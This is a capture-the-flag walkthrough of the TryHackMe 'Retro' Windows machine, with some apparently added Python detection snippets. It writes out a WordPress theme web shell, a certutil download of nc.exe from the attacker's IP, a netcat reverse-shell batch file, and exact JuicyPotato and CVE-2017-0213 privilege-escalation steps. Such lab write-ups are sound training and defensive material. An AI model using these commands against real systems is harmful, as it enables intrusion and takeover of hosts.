TryHackMe - Retro

Information Card

Brief

This was a good machine with a really nice privilege escalation path. I didn't enjoy the foothold part as much as I enjoyed the privilege escalation part. There are two ways in which I escalated privileges on this machine. We will use both CVE-2017-0213 and JuicyPotato to escalate privileges. Let's get started.

Reconnaissance

I use a tool called nmapAutomator, which I can recommend; alternatively, you can also use AutoRecon.

NMap Basic Scan


---------------------Starting Nmap Basic Scan---------------------

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 17:00 IST
Nmap scan report for retro (10.10.253.247)
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2021-01-23T11:30:12+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2021-01-22T11:13:58
|_Not valid after: 2021-07-24T11:13:58
|_ssl-date: 2021-01-23T11:30:15+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds


OS Detection modified to: Windows

We have hence identified two running services:

  • HTTP (80)
  • Remote Desktop Protocol (3389)

Enumeration

I first added the following line to my /etc/hosts: 10.10.253.247 retro retro.thm. This helps with name resolution in case there are virtual hosts.

Note: This is just my guess, as I usually follow this convention when dealing with CTF boxes like HackTheBox and TryHackMe. It makes the target easier to remember than an IP. If I come across the name of the machine during my enumeration, I update /etc/hosts to reflect it.

HTTP Enumeration

Visiting the machine at http://retro.thm gave me the default IIS page.

FFuF

I put ffuf to work brute-forcing the website for additional files and directories, using this command: ffuf -w $WORDLIST_MEDIUM -u http://retro.thm/FUZZ -e .aspx,.txt,.html,.php -c -replay-proxy http://127.0.0.1:8080. With -replay-proxy, ffuf sends every positive result to my Burp proxy running on localhost:8080.

Soon ffuf returned a directory called retro. Visiting http://retro.thm/retro showed a WordPress site.

This WordPress site had quite a few articles on it. I skimmed through them all and let wpscan do the required job.

WPScan

HTTP Landing Page

I made wpscan enumerate the newly discovered website with this command: wpscan --enumerate ap,vp,p,dbe,cb --url http://retro.thm/retro

Soon it returned that the installed version was Wordpress Version: 1.4.10 and that all the posts were written by a user called Wade. I made a note of this information in a file called usernames. This will be helpful if we have to brute force our way in.

While going through the website I looked at a post called Ready Player One, which had the comment "Leaving myself a note here incase I forget how to spell it: parzival". This felt a little odd.

Wade says

I used the username wade and the password parzival to log in, and sure enough it worked.

Wordpress Logged In.

Exploitation

Now, since we have access to the admin panel, we can edit the theme files in WordPress to get a reverse shell. So I downloaded the web shell from this repository and replaced the contents of the file at Appearance->Editor->404.php with those of the shell. Visiting http://retro.thm/retro/wp-content/themes/90s-retro/404.php then gave me a web shell.

Download Netcat to victim machine

I then downloaded nc.exe to the victim machine with certutil (certutil.exe -urlcache -split -f http://10.11.21.208:8000/nc.exe) and used nc.exe to get a reverse shell from the victim.

Getting a reverse shell

A reverse shell

However, this is a service account; we don't have access to either Wade or Administrator yet.
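From the defender's side, the theme-editor edit and the certutil download above both leave traces. The following Python is an added example (not part of the original writeup) that flags them over constructed IIS W3C log lines and process-creation events; the `cmd` query parameter, the w3wp.exe parent process and the exact log fields are assumptions, while wp-admin/theme-editor.php is the WordPress theme editor behind Appearance->Editor.

```python
import re

# Constructed sample IIS W3C log lines and process-creation events (not taken from
# the writeup); they model the artefacts the theme-editor web shell and the
# certutil download leave behind.
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2021-01-23 11:35:01 10.10.253.247 POST /retro/wp-admin/theme-editor.php - 80 - 10.11.21.208 302
2021-01-23 11:35:40 10.10.253.247 GET /retro/wp-content/themes/90s-retro/404.php cmd=whoami 80 - 10.11.21.208 200
2021-01-23 11:36:02 10.10.253.247 GET /retro/index.php - 80 - 10.10.14.5 200
"""

PROC_EVENTS = [  # fields as a Sysmon-style collector would present them (constructed)
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://10.11.21.208:8000/nc.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "certutil -verify cert.cer"},
]

# Direct request to a PHP file inside a theme directory (theme files are not meant to be hit directly).
THEME_PHP = re.compile(r"^/[^?]*/wp-content/themes/[^/]+/[^/]+\.php$", re.I)

def parse_iis(text):
    """Turn W3C extended log lines into dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def theme_webshell_findings(rows):
    """Flag theme-editor writes and direct hits on theme PHP files that carry parameters."""
    out = []
    for r in rows:
        if r["cs-method"] == "POST" and r["cs-uri-stem"].lower().endswith("/wp-admin/theme-editor.php"):
            out.append(("theme_editor_write", r["c-ip"], r["cs-uri-stem"]))
        elif THEME_PHP.match(r["cs-uri-stem"]) and r["cs-uri-query"] != "-":
            out.append(("theme_php_with_query", r["c-ip"], r["cs-uri-stem"]))
    return out

def certutil_download_findings(events):
    """Flag certutil used as a downloader (-urlcache plus a URL); rate it high when IIS spawned it."""
    out = []
    for e in events:
        cl = e["cmdline"].lower()
        if e["image"].lower().endswith("certutil.exe") and "-urlcache" in cl and "://" in cl:
            sev = "high" if e["parent"].lower().endswith("w3wp.exe") else "medium"
            out.append((sev, e["cmdline"]))
    return out
```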

Privilege Escalation

First Method

I began enumerating the machine and found that the service account I currently had a shell as held SeImpersonatePrivilege.

Impersonate Privilege Escalation

This meant JuicyPotato. I have a compiled version of juicy-potato here. I downloaded JuicyPotato to the victim machine and then tested for a valid CLSID for Microsoft Windows Server 2016 Standard.

I downloaded test_clsid.bat, which is originally available here (I also keep a copy here). I then made a file called CLSID.list with some CLSIDs I assumed would work; I got them from here.

I then ran the batch script on the victim machine and fortunately found a valid CLSID that would allow me to impersonate Administrator.

Testing for valid CLSID

Valid CLSID

Once I had confirmed a valid CLSID, I created another script to give me a reverse shell. I named this file t.bat at random. Below are the contents of t.bat:

@echo off
C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\nc2.exe -e cmd 10.11.21.208 1235

I then downloaded this bat file from my machine to the victim and executed juicypotato.exe: juicypotato.exe -l 1337 -p C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\t.bat -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

Gaining a root shell

We are now Administrator.
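The finding that turned a web shell into Administrator was a service account holding SeImpersonatePrivilege. As an added example (not the author's tooling), this Python parses constructed `whoami /priv` output and rates the token-abuse exposure of the account that holds it; the privilege list and the account names are constructed, and the "Disabled" handling reflects that a held privilege can be re-enabled by the process itself.

```python
import re

# Constructed `whoami /priv` output for a web service account (not copied from the writeup).
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Privileges that let a compromised process run code under another account's token.
TOKEN_ABUSE_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
# Network-facing service identities (lower-cased prefixes) are the riskiest holders.
SERVICE_IDENTITIES = ("iis apppool\\", "nt authority\\network service", "nt authority\\local service")

def parse_whoami_priv(text):
    """Map privilege name -> state, skipping the headers and ruler lines."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def token_abuse_exposure(privs):
    """Return the dangerous privileges the token holds, regardless of state:
    a 'Disabled' privilege is still held and the process can enable it itself."""
    return sorted(p for p in privs if p in TOKEN_ABUSE_PRIVS)

def assess(account, whoami_priv_text):
    """Summarise the risk for one account: 'ok', or a 'critical'/'review' line naming the privileges."""
    held = token_abuse_exposure(parse_whoami_priv(whoami_priv_text))
    if not held:
        return "ok"
    exposed = account.lower().startswith(SERVICE_IDENTITIES)
    return f"{'critical' if exposed else 'review'}: {account} holds {', '.join(held)}"
```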

Second Method

The credentials that worked for WordPress, wade:parzival, also gave us an RDP session. You can use xfreerdp for this: xfreerdp /u:Wade /p:parzival /v:10.10.253.247. This lands us inside the machine as Wade.

Remote Desktop Protocol

This build of Windows is vulnerable to CVE-2017-0213, the Windows COM Privilege Escalation Vulnerability, which you can read about here.

So I downloaded the exploit, which is available here, and then transferred it to the victim machine. After downloading the exploit I executed it, which gave me a prompt as Administrator.

Exploiting CVE-2017-0213 to gain a reverse shell as Admin

Root Shell 2

Proof

echo|set /p="user.txt : " & more C:\Users\Wade\Desktop\user.txt.txt & echo|set /p="root.txt : " & more C:\Users\Administrator\Desktop\root.txt.txt & echo "Network Interfaces : " & ipconfig & echo|set /p="whoami : " & whoami & echo|set /p="hostname : " & hostname

Proof